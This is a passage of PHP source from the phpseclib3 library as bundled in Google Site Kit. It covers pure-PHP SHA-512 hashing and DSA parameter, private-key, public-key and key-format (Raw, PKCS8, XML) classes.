$st[$i][3], $st[$i][2] ^ ~$st[$i][3] & $st[$i][4], $st[$i][3] ^ ~$st[$i][4] & $st[$i][0], $st[$i][4] ^ ~$st[$i][0] & $st[$i][1]]; } // iota step $s[0][0] ^= $roundConstants[$round]; } } /** * Left rotate 64-bit int * * @param int $x * @param int $shift */ private static function rotateLeft64($x, $shift) { $mask = -1 ^ -1 << $shift; return $x << $shift | $x >> 64 - $shift & $mask; } /** * Right rotate 64-bit int * * @param int $x * @param int $shift */ private static function rotateRight64($x, $shift) { $mask = -1 ^ -1 << 64 - $shift; return $x >> $shift & $mask | $x << 64 - $shift; } /** * Pure-PHP implementation of SHA512 * * @param string $m * @param array $hash * @return string */ private static function sha512($m, $hash) { static $k; if (!isset($k)) { // Initialize table of round constants // (first 64 bits of the fractional parts of the cube roots of the first 80 primes 2..409) $k = ['428a2f98d728ae22', '7137449123ef65cd', 'b5c0fbcfec4d3b2f', 'e9b5dba58189dbbc', '3956c25bf348b538', '59f111f1b605d019', '923f82a4af194f9b', 'ab1c5ed5da6d8118', 'd807aa98a3030242', '12835b0145706fbe', '243185be4ee4b28c', '550c7dc3d5ffb4e2', '72be5d74f27b896f', '80deb1fe3b1696b1', '9bdc06a725c71235', 'c19bf174cf692694', 'e49b69c19ef14ad2', 'efbe4786384f25e3', '0fc19dc68b8cd5b5', '240ca1cc77ac9c65', '2de92c6f592b0275', '4a7484aa6ea6e483', '5cb0a9dcbd41fbd4', '76f988da831153b5', '983e5152ee66dfab', 'a831c66d2db43210', 'b00327c898fb213f', 'bf597fc7beef0ee4', 'c6e00bf33da88fc2', 'd5a79147930aa725', '06ca6351e003826f', '142929670a0e6e70', '27b70a8546d22ffc', '2e1b21385c26c926', '4d2c6dfc5ac42aed', '53380d139d95b3df', '650a73548baf63de', '766a0abb3c77b2a8', '81c2c92e47edaee6', '92722c851482353b', 'a2bfe8a14cf10364', 'a81a664bbc423001', 'c24b8b70d0f89791', 'c76c51a30654be30', 'd192e819d6ef5218', 'd69906245565a910', 'f40e35855771202a', '106aa07032bbd1b8', '19a4c116b8d2d0c8', '1e376c085141ab53', '2748774cdf8eeb99', '34b0bcb5e19b48a8', '391c0cb3c5c95a63', '4ed8aa4ae3418acb', '5b9cca4f7763e373', '682e6ff3d6b2b8a3', '748f82ee5defb2fc', '78a5636f43172f60', '84c87814a1f0ab72', '8cc702081a6439ec', '90befffa23631e28', 'a4506cebde82bde9', 'bef9a3f7b2c67915', 'c67178f2e372532b', 'ca273eceea26619c', 'd186b8c721c0c207', 'eada7dd6cde0eb1e', 'f57d4f7fee6ed178', '06f067aa72176fba', '0a637dc5a2c898a6', '113f9804bef90dae', '1b710b35131c471b', '28db77f523047d84', '32caab7b40c72493', '3c9ebe0a15c9bebc', '431d67c49c100d4c', '4cc5d4becb3e42b6', '597f299cfc657e2a', '5fcb6fab3ad6faec', '6c44198c4a475817']; for ($i = 0; $i < 80; $i++) { $k[$i] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($k[$i], 16); } } // Pre-processing $length = \strlen($m); // to round to nearest 112 mod 128, we'll add 128 - (length + (128 - 112)) % 128 $m .= \str_repeat(\chr(0), 128 - ($length + 16 & 0x7f)); $m[$length] = \chr(0x80); // we don't support hashing strings 512MB long $m .= \pack('N4', 0, 0, 0, $length << 3); // Process the message in successive 1024-bit chunks $chunks = \str_split($m, 128); foreach ($chunks as $chunk) { $w = []; for ($i = 0; $i < 16; $i++) { $temp = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($chunk, 8), 256); $temp->setPrecision(64); $w[] = $temp; } // Extend the sixteen 32-bit words into eighty 32-bit words for ($i = 16; $i < 80; $i++) { $temp = [$w[$i - 15]->bitwise_rightRotate(1), $w[$i - 15]->bitwise_rightRotate(8), $w[$i - 15]->bitwise_rightShift(7)]; $s0 = $temp[0]->bitwise_xor($temp[1]); $s0 = $s0->bitwise_xor($temp[2]); $temp = [$w[$i - 2]->bitwise_rightRotate(19), $w[$i - 2]->bitwise_rightRotate(61), $w[$i - 2]->bitwise_rightShift(6)]; $s1 = $temp[0]->bitwise_xor($temp[1]); $s1 = $s1->bitwise_xor($temp[2]); $w[$i] = clone $w[$i - 16]; $w[$i] = $w[$i]->add($s0); $w[$i] = $w[$i]->add($w[$i - 7]); $w[$i] = $w[$i]->add($s1); } // Initialize hash value for this chunk $a = clone $hash[0]; $b = clone $hash[1]; $c = clone $hash[2]; $d = clone $hash[3]; $e = clone $hash[4]; $f = clone $hash[5]; $g = clone $hash[6]; $h = clone $hash[7]; // Main loop for ($i = 0; $i < 80; $i++) { $temp = [$a->bitwise_rightRotate(28), $a->bitwise_rightRotate(34), $a->bitwise_rightRotate(39)]; $s0 = $temp[0]->bitwise_xor($temp[1]); $s0 = $s0->bitwise_xor($temp[2]); $temp = [$a->bitwise_and($b), $a->bitwise_and($c), $b->bitwise_and($c)]; $maj = $temp[0]->bitwise_xor($temp[1]); $maj = $maj->bitwise_xor($temp[2]); $t2 = $s0->add($maj); $temp = [$e->bitwise_rightRotate(14), $e->bitwise_rightRotate(18), $e->bitwise_rightRotate(41)]; $s1 = $temp[0]->bitwise_xor($temp[1]); $s1 = $s1->bitwise_xor($temp[2]); $temp = [$e->bitwise_and($f), $g->bitwise_and($e->bitwise_not())]; $ch = $temp[0]->bitwise_xor($temp[1]); $t1 = $h->add($s1); $t1 = $t1->add($ch); $t1 = $t1->add($k[$i]); $t1 = $t1->add($w[$i]); $h = clone $g; $g = clone $f; $f = clone $e; $e = $d->add($t1); $d = clone $c; $c = clone $b; $b = clone $a; $a = $t1->add($t2); } // Add this chunk's hash to result so far $hash = [$hash[0]->add($a), $hash[1]->add($b), $hash[2]->add($c), $hash[3]->add($d), $hash[4]->add($e), $hash[5]->add($f), $hash[6]->add($g), $hash[7]->add($h)]; } // Produce the final hash value (big-endian) // (\phpseclib3\Crypt\Hash::hash() trims the output for hashes but not for HMACs. as such, we trim the output here) $temp = $hash[0]->toBytes() . $hash[1]->toBytes() . $hash[2]->toBytes() . $hash[3]->toBytes() . $hash[4]->toBytes() . $hash[5]->toBytes() . $hash[6]->toBytes() . $hash[7]->toBytes(); return $temp; } /** * Pure-PHP implementation of SHA512 * * @param string $m * @param array $hash * @return string */ private static function sha512_64($m, $hash) { static $k; if (!isset($k)) { // Initialize table of round constants // (first 64 bits of the fractional parts of the cube roots of the first 80 primes 2..409) $k = ['428a2f98d728ae22', '7137449123ef65cd', 'b5c0fbcfec4d3b2f', 'e9b5dba58189dbbc', '3956c25bf348b538', '59f111f1b605d019', '923f82a4af194f9b', 'ab1c5ed5da6d8118', 'd807aa98a3030242', '12835b0145706fbe', '243185be4ee4b28c', '550c7dc3d5ffb4e2', '72be5d74f27b896f', '80deb1fe3b1696b1', '9bdc06a725c71235', 'c19bf174cf692694', 'e49b69c19ef14ad2', 'efbe4786384f25e3', '0fc19dc68b8cd5b5', '240ca1cc77ac9c65', '2de92c6f592b0275', '4a7484aa6ea6e483', '5cb0a9dcbd41fbd4', '76f988da831153b5', '983e5152ee66dfab', 'a831c66d2db43210', 'b00327c898fb213f', 'bf597fc7beef0ee4', 'c6e00bf33da88fc2', 'd5a79147930aa725', '06ca6351e003826f', '142929670a0e6e70', '27b70a8546d22ffc', '2e1b21385c26c926', '4d2c6dfc5ac42aed', '53380d139d95b3df', '650a73548baf63de', '766a0abb3c77b2a8', '81c2c92e47edaee6', '92722c851482353b', 'a2bfe8a14cf10364', 'a81a664bbc423001', 'c24b8b70d0f89791', 'c76c51a30654be30', 'd192e819d6ef5218', 'd69906245565a910', 'f40e35855771202a', '106aa07032bbd1b8', '19a4c116b8d2d0c8', '1e376c085141ab53', '2748774cdf8eeb99', '34b0bcb5e19b48a8', '391c0cb3c5c95a63', '4ed8aa4ae3418acb', '5b9cca4f7763e373', '682e6ff3d6b2b8a3', '748f82ee5defb2fc', '78a5636f43172f60', '84c87814a1f0ab72', '8cc702081a6439ec', '90befffa23631e28', 'a4506cebde82bde9', 'bef9a3f7b2c67915', 'c67178f2e372532b', 'ca273eceea26619c', 'd186b8c721c0c207', 'eada7dd6cde0eb1e', 'f57d4f7fee6ed178', '06f067aa72176fba', '0a637dc5a2c898a6', '113f9804bef90dae', '1b710b35131c471b', '28db77f523047d84', '32caab7b40c72493', '3c9ebe0a15c9bebc', '431d67c49c100d4c', '4cc5d4becb3e42b6', '597f299cfc657e2a', '5fcb6fab3ad6faec', '6c44198c4a475817']; for ($i = 0; $i < 80; $i++) { list(, $k[$i]) = \unpack('J', \pack('H*', $k[$i])); } } // Pre-processing $length = \strlen($m); // to round to nearest 112 mod 128, we'll add 128 - (length + (128 - 112)) % 128 $m .= \str_repeat(\chr(0), 128 - ($length + 16 & 0x7f)); $m[$length] = \chr(0x80); // we don't support hashing strings 512MB long $m .= \pack('N4', 0, 0, 0, $length << 3); // Process the message in successive 1024-bit chunks $chunks = \str_split($m, 128); foreach ($chunks as $chunk) { $w = []; for ($i = 0; $i < 16; $i++) { list(, $w[]) = \unpack('J', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($chunk, 8)); } // Extend the sixteen 32-bit words into eighty 32-bit words for ($i = 16; $i < 80; $i++) { $temp = [self::rotateRight64($w[$i - 15], 1), self::rotateRight64($w[$i - 15], 8), $w[$i - 15] >> 7 & 0x1ffffffffffffff]; $s0 = $temp[0] ^ $temp[1] ^ $temp[2]; $temp = [self::rotateRight64($w[$i - 2], 19), self::rotateRight64($w[$i - 2], 61), $w[$i - 2] >> 6 & 0x3ffffffffffffff]; $s1 = $temp[0] ^ $temp[1] ^ $temp[2]; $w[$i] = $w[$i - 16]; $w[$i] = self::add64($w[$i], $s0); $w[$i] = self::add64($w[$i], $w[$i - 7]); $w[$i] = self::add64($w[$i], $s1); } // Initialize hash value for this chunk list($a, $b, $c, $d, $e, $f, $g, $h) = $hash; // Main loop for ($i = 0; $i < 80; $i++) { $temp = [self::rotateRight64($a, 28), self::rotateRight64($a, 34), self::rotateRight64($a, 39)]; $s0 = $temp[0] ^ $temp[1] ^ $temp[2]; $temp = [$a & $b, $a & $c, $b & $c]; $maj = $temp[0] ^ $temp[1] ^ $temp[2]; $t2 = self::add64($s0, $maj); $temp = [self::rotateRight64($e, 14), self::rotateRight64($e, 18), self::rotateRight64($e, 41)]; $s1 = $temp[0] ^ $temp[1] ^ $temp[2]; $ch = $e & $f ^ $g & ~$e; $t1 = self::add64($h, $s1); $t1 = self::add64($t1, $ch); $t1 = self::add64($t1, $k[$i]); $t1 = self::add64($t1, $w[$i]); $h = $g; $g = $f; $f = $e; $e = self::add64($d, $t1); $d = $c; $c = $b; $b = $a; $a = self::add64($t1, $t2); } // Add this chunk's hash to result so far $hash = [self::add64($hash[0], $a), self::add64($hash[1], $b), self::add64($hash[2], $c), self::add64($hash[3], $d), self::add64($hash[4], $e), self::add64($hash[5], $f), self::add64($hash[6], $g), self::add64($hash[7], $h)]; } // Produce the final hash value (big-endian) // (\phpseclib3\Crypt\Hash::hash() trims the output for hashes but not for HMACs. as such, we trim the output here) return \pack('J*', ...$hash); } /** * __toString() magic method */ public function __toString() { return $this->getHash(); } } <?php /** * DSA Parameters * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; /** * DSA Parameters * * @author Jim Wigginton <terrafrost@php.net> */ final class Parameters extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA { /** * Returns the parameters * * @param string $type * @param array $options optional * @return string */ public function toString($type = 'PKCS1', array $options = []) { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); return $type::saveParameters($this->p, $this->q, $this->g, $options); } } <?php /** * DSA Private Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature\ASN1 as ASN1Signature; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * DSA Private Key * * @author Jim Wigginton <terrafrost@php.net> */ final class PrivateKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey { use Common\Traits\PasswordProtected; /** * DSA secret exponent x * * @var BigInteger */ protected $x; /** * Returns the public key * * If you do "openssl rsa -in private.rsa -pubout -outform PEM" you get a PKCS8 formatted key * that contains a publicKeyAlgorithm AlgorithmIdentifier and a publicKey BIT STRING. * An AlgorithmIdentifier contains an OID and a parameters field. With RSA public keys this * parameters field is NULL. With DSA PKCS8 public keys it is not - it contains the p, q and g * variables. The publicKey BIT STRING contains, simply, the y variable. This can be verified * by getting a DSA PKCS8 public key: * * "openssl dsa -in private.dsa -pubout -outform PEM" * * ie. just swap out rsa with dsa in the rsa command above. * * A PKCS1 public key corresponds to the publicKey portion of the PKCS8 key. In the case of RSA * the publicKey portion /is/ the key. In the case of DSA it is not. You cannot verify a signature * without the parameters and the PKCS1 DSA public key format does not include the parameters. * * @see self::getPrivateKey() * @return mixed */ public function getPublicKey() { $type = self::validatePlugin('Keys', 'PKCS8', 'savePublicKey'); if (!isset($this->y)) { $this->y = $this->g->powMod($this->x, $this->p); } $key = $type::savePublicKey($this->p, $this->q, $this->g, $this->y); return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA::loadFormat('PKCS8', $key)->withHash($this->hash->getHash())->withSignatureFormat($this->shortFormat); } /** * Create a signature * * @see self::verify() * @param string $message * @return mixed */ public function sign($message) { $format = $this->sigFormat; if (self::$engines['OpenSSL'] && \in_array($this->hash->getHash(), \openssl_get_md_methods())) { $signature = ''; $result = \openssl_sign($message, $signature, $this->toString('PKCS8'), $this->hash->getHash()); if ($result) { if ($this->shortFormat == 'ASN1') { return $signature; } \extract(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature\ASN1::load($signature)); return $format::save($r, $s); } } $h = $this->hash->hash($message); $h = $this->bits2int($h); while (\true) { $k = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange(self::$one, $this->q->subtract(self::$one)); $r = $this->g->powMod($k, $this->p); list(, $r) = $r->divide($this->q); if ($r->equals(self::$zero)) { continue; } $kinv = $k->modInverse($this->q); $temp = $h->add($this->x->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($this->q); if (!$s->equals(self::$zero)) { break; } } // the following is an RFC6979 compliant implementation of deterministic DSA // it's unused because it's mainly intended for use when a good CSPRNG isn't // available. if phpseclib's CSPRNG isn't good then even key generation is // suspect /* $h1 = $this->hash->hash($message); $k = $this->computek($h1); $r = $this->g->powMod($k, $this->p); list(, $r) = $r->divide($this->q); $kinv = $k->modInverse($this->q); $h1 = $this->bits2int($h1); $temp = $h1->add($this->x->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($this->q); */ return $format::save($r, $s); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePrivateKey'); if (!isset($this->y)) { $this->y = $this->g->powMod($this->x, $this->p); } return $type::savePrivateKey($this->p, $this->q, $this->g, $this->y, $this->x, $this->password, $options); } } <?php /** * DSA Public Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature\ASN1 as ASN1Signature; /** * DSA Public Key * * @author Jim Wigginton <terrafrost@php.net> */ final class PublicKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA implements \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey { use Common\Traits\Fingerprint; /** * Verify a signature * * @see self::verify() * @param string $message * @param string $signature * @return mixed */ public function verify($message, $signature) { $format = $this->sigFormat; $params = $format::load($signature); if ($params === \false || \count($params) != 2) { return \false; } \extract($params); if (self::$engines['OpenSSL'] && \in_array($this->hash->getHash(), \openssl_get_md_methods())) { $sig = $format != 'ASN1' ? \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature\ASN1::save($r, $s) : $signature; $result = \openssl_verify($message, $sig, $this->toString('PKCS8'), $this->hash->getHash()); if ($result != -1) { return (bool) $result; } } $q_1 = $this->q->subtract(self::$one); if (!$r->between(self::$one, $q_1) || !$s->between(self::$one, $q_1)) { return \false; } $w = $s->modInverse($this->q); $h = $this->hash->hash($message); $h = $this->bits2int($h); list(, $u1) = $h->multiply($w)->divide($this->q); list(, $u2) = $r->multiply($w)->divide($this->q); $v1 = $this->g->powMod($u1, $this->p); $v2 = $this->y->powMod($u2, $this->p); list(, $v) = $v1->multiply($v2)->divide($this->p); list(, $v) = $v->divide($this->q); return $v->equals($r); } /** * Returns the public key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); return $type::savePublicKey($this->p, $this->q, $this->g, $this->y, $options); } } <?php /** * Raw DSA Key Handler * * PHP version 5 * * Reads and creates arrays as DSA keys * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Raw DSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Raw { /** * Break a public or private key down into its constituent components * * @param array $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!\is_array($key)) { throw new \UnexpectedValueException('Key should be a array - not a ' . \gettype($key)); } switch (\true) { case !isset($key['p']) || !isset($key['q']) || !isset($key['g']): case !$key['p'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: case !$key['q'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: case !$key['g'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: case !isset($key['x']) && !isset($key['y']): case isset($key['x']) && !$key['x'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: case isset($key['y']) && !$key['y'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: throw new \UnexpectedValueException('Key appears to be malformed'); } $options = ['p' => 1, 'q' => 1, 'g' => 1, 'x' => 1, 'y' => 1]; return \array_intersect_key($key, $options); } /** * Convert a private key to the appropriate format. * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param BigInteger $x * @param string $password optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x, $password = '') { return \compact('p', 'q', 'g', 'y', 'x'); } /** * Convert a public key to the appropriate format * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { return \compact('p', 'q', 'g', 'y'); } } <?php /** * PKCS#8 Formatted DSA Key Handler * * PHP version 5 * * Processes keys with the following headers: * * -----BEGIN ENCRYPTED PRIVATE KEY----- * -----BEGIN PRIVATE KEY----- * -----BEGIN PUBLIC KEY----- * * Analogous to ssh-keygen's pkcs8 format (as specified by -m). Although PKCS8 * is specific to private keys it's basically creating a DER-encoded wrapper * for keys. This just extends that same concept to public keys (much like ssh-keygen) * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted DSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS8 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 { /** * OID Name * * @var string */ const OID_NAME = 'id-dsa'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.10040.4.1'; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = \false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'privateKey' : 'publicKey'; $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key[$type . 'Algorithm']['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER of parameters'); } $components = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAParams::MAP); if (!\is_array($components)) { throw new \RuntimeException('Unable to perform ASN1 mapping on parameters'); } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key[$type]); if (empty($decoded)) { throw new \RuntimeException('Unable to decode BER'); } $var = $type == 'privateKey' ? 'x' : 'y'; $components[$var] = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPublicKey::MAP); if (!$components[$var] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (isset($key['meta'])) { $components['meta'] = $key['meta']; } return $components; } /** * Convert a private key to the appropriate format. * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x, $password = '', array $options = []) { $params = ['p' => $p, 'q' => $q, 'g' => $g]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAParams::MAP); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($x, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPublicKey::MAP); return self::wrapPrivateKey($key, [], $params, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, array $options = []) { $params = ['p' => $p, 'q' => $q, 'g' => $g]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAParams::MAP); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($y, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPublicKey::MAP); return self::wrapPublicKey($key, $params, null, $options); } } <?php /** * XML Formatted DSA Key Handler * * While XKMS defines a private key format for RSA it does not do so for DSA. Quoting that standard: * * "[XKMS] does not specify private key parameters for the DSA signature algorithm since the algorithm only * supports signature modes and so the application of server generated keys and key recovery is of limited * value" * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * XML Formatted DSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class XML { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } if (!\class_exists('DOMDocument')) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException('The dom extension is not setup correctly on this system'); } $use_errors = \libxml_use_internal_errors(\true); $dom = new \DOMDocument(); if (\substr($key, 0, 5) != '<?xml') { $key = '<xml>' . $key . '</xml>'; } if (!$dom->loadXML($key)) { \libxml_use_internal_errors($use_errors); throw new \UnexpectedValueException('Key does not appear to contain XML'); } $xpath = new \DOMXPath($dom); $keys = ['p', 'q', 'g', 'y', 'j', 'seed', 'pgencounter']; foreach ($keys as $key) { // $dom->getElementsByTagName($key) is case-sensitive $temp = $xpath->query("//*[translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='{$key}']"); if (!$temp->length) { continue; } $value = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($temp->item(0)->nodeValue), 256); switch ($key) { case 'p': // a prime modulus meeting the [DSS] requirements // Parameters P, Q, and G can be public and common to a group of users. They might be known // from application context. As such, they are optional but P and Q must either both appear // or both be absent $components['p'] = $value; break; case 'q': // an integer in the range 2**159 < Q < 2**160 which is a prime divisor of P-1 $components['q'] = $value; break; case 'g': // an integer with certain properties with respect to P and Q $components['g'] = $value; break; case 'y': // G**X mod P (where X is part of the private key and not made public) $components['y'] = $value; // the remaining options do not do anything case 'j': // (P - 1) / Q // Parameter J is available for inclusion solely for efficiency as it is calculatable from // P and Q case 'seed': // a DSA prime generation seed // Parameters seed and pgenCounter are used in the DSA prime number generation algorithm // specified in [DSS]. As such, they are optional but must either both be present or both // be absent case 'pgencounter': } } \libxml_use_internal_errors($use_errors); if (!isset($components['y'])) { throw new \UnexpectedValueException('Key is missing y component'); } switch (\true) { case !isset($components['p']): case !isset($components['q']): case !isset($components['g']): return ['y' => $components['y']]; } return $components; } /** * Convert a public key to the appropriate format * * See https://www.w3.org/TR/xmldsig-core/#sec-DSAKeyValue * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { return "<DSAKeyValue>\r\n" . ' <P>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($p->toBytes()) . "</P>\r\n" . ' <Q>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($q->toBytes()) . "</Q>\r\n" . ' <G>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($g->toBytes()) . "</G>\r\n" . ' <Y>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($y->toBytes()) . "</Y>\r\n" . '</DSAKeyValue>'; } } <?php /** * OpenSSH Formatted DSA Key Handler * * PHP version 5 * * Place in $HOME/.ssh/authorized_keys * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\OpenSSH as Progenitor; use 